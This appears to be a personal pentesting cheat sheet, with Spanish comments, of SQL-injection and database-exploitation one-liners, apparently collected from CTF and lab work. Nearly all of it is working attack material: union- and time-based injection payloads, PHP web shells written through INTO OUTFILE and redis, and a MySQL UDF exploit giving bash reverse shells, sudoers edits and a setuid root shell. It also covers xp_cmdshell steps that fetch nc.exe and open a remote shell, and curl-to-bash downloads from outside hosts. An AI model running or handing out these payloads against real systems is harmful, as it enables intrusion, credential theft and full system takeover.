# sql queries oneliners
mysql -uadmin -ppassword -e 'select id,name from osticket_db.ost_user'

# sqli wordlist
https://github.com/xmendez/wfuzz/blob/master/wordlist/Injections/SQL.txt

# con acceso a una BD podemos insertar codigo PHP para ganar RCE
mysql>select '<?php $cmd=$_GET["cmd"];system($cmd);?>' INTO OUTFILE '/var/www/html/shell.php';
at> curl 192.168.100.1:8080/shell.php?cmd=whoami
at> curl http://192.168.100.1:8080/shell.php?cmd=curl http://10.50.155.7:8000/shell.sh | bash

# mysql responder hash attack
responder -I tun0
1' union select 1,load_file('////IP_A/RECURSO'),1-- -
john ntlmv2.hash --wordlists=diccionario

# sqlinjection test
admin'-- -
admin' or '1'='1

# sqli tipo error based
# test sqli
" union select 1,2,@@hostname,4 -- -.
" union select 1,2,load_file('/etc/passwd'),4 -- -.

# enumeration phpipam
" union select 1,2,schema_name,4 from information_schema.schemata-- -.
" union select 1,2,table_name,4 from information_schema.tables where table_schema = 'phpipam' limit 1,1-- -.
" union select 1,2,column_name,4 from information_schema.columns where table_schema = 'phpipam' and table_name = 'users'-- -.
" union select 1,2,concat(username,0x3a,password),4 from phpipam.users-- -.

# buscando permisos para escribir en el sistema
" union all select 1,2,user,4 from mysql.user-- -.
" union all select 1,2,group_concat(user,0x3a,file_priv),4 from mysql.user-- -.
" union all select 1,2,load_file('/etc/passwd'),4 from mysql.user-- -.

# para encontrar cantidad de tablas
order by 10

# para encontrar cantidad de columnas
union select 1,2,3,database(); # consultado dbs
union select 1,2,3,version(); # consultado version del motor
union select 1,2,3,load_file('/etc/passwd'); # LFI
union select 1,load_file('C://windows//system32/drivers/etc/hosts'),2 # LFI

# sqli tipo time based
UNION SELECT SLEEP(2),2 FROM information_schema.columns WHERE table_schema ='sqli_four' and table_name = 'users' and column_name like '%';--
UNION SELECT SLEEP(2),2 from users where username='admin' and password like '%';--
UNION SELECT SLEEP(2),2 from users where username='admin' and password like '4961';--

# mysql beautify output
mysql> select * from wp-user\G

# mysql-tools
mysqlshow -u USER -p PASS DATABASE TABLES

mysqldump -u USER --password=PASS --single-transaction --all-databases
mysqldump -u USER --password=PASS --no-data TABLES
mysqldump -u root -p Password123! --all-databases > all_db_backup.sql

# sqlmap
sqlmap.py -u URL --method POST --data "username=FUZZ&password=" -P username --dbs --dbms mysql --level 2 --threads 10 
sqlmap -u 'http://10.129.154.173/dashboard.php?search=1' --level 3 --dbms 'oracle' --dump-all --batch
sqlmap -u 'http://10.129.154.173/dashboard.php?search=1' --cookie="PHPSESSID=gjfbgkutlm9q1vtavt2gmi00ne" --os-shell --flush-session

sqlmap.py -u "http://ip/register/user-check?username=admin" --dbms mysql -D database -T flag --dump-all --batch

sqlmap -r lockdown.req --dbms=mysql --dump -T 'users' -D 'cts_db' -C 'username,password'

sqlmap -u "http://192.168.1.100/section.php" --data "id=50&pass=1234" --dbs --threads 10 
sqlmap -u "http://192.168.1.100/section.php?id=51" --sql-query="select * from users"

# mysql (UDFs exploit):
gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

mysql -u root
use mysql;
create table foo(line blob);
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';

select do_system('bash -i >& /dev/tcp/10.8.23.159/9001 0>&1'); #bash rev shell
select do_system('echo "smeagol ALL =(ALL) NOPASSWD: ALL" >> /etc/sudoers'); # modificando /etc/sudoers
select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
/tmp/rootbash -p # root shell

#mssql server windows enum:
sqsh -S MACHINE_IP -U sa -P t7uLKzddQzVjVFJp

1> SELECT * FROM reindeer.dbo.names;
2> go

1> xp_cmdshell 'whoami';
2> go

# Activar xp_cmdshell con sp_configure
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
-- activando xp_cmdshell
EXEC sp_configure 'xp_cmdshell', '1' 
RECONFIGURE

EXEC master..xp_cmdshell 'whoami'

SQL> xp_cmdshell "powershell wget http://10.10.15.130:8000/nc.exe -OutFile %temp%/nc.exe"
SQL> xp_cmdshell "powershell %temp%/nc.exe 10.10.15.130 4444 -e cmd.exe"

# redis RCE
echo "CONFIG SET dir /var/www/html" | redis-cli
echo "CONFIG SET dbfilename dosh.php" | redis-cli
echo "SET PAYLOAD \"<?php system(\$_GET['cmd']); ?>\"" | redis-cli
echo "BGSAVE" | redis-cli

# RCE via INTO OUTFILE
<?php system($_GET["cmd"]);?> to hex
" union select 1,2,0x3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e,4 INTO OUTFILE '/var/www/html/sh.php'-- -.

<?php exec("bash -c 'bash -i >& /dev/tcp/10.6.4.61/4444 0>&1'");?> to hex1
" union select 1,2,0x3c3f7068702065786563282262617368202,4 INTO OUTFILE '/var/www/html/shell.php'-- -.
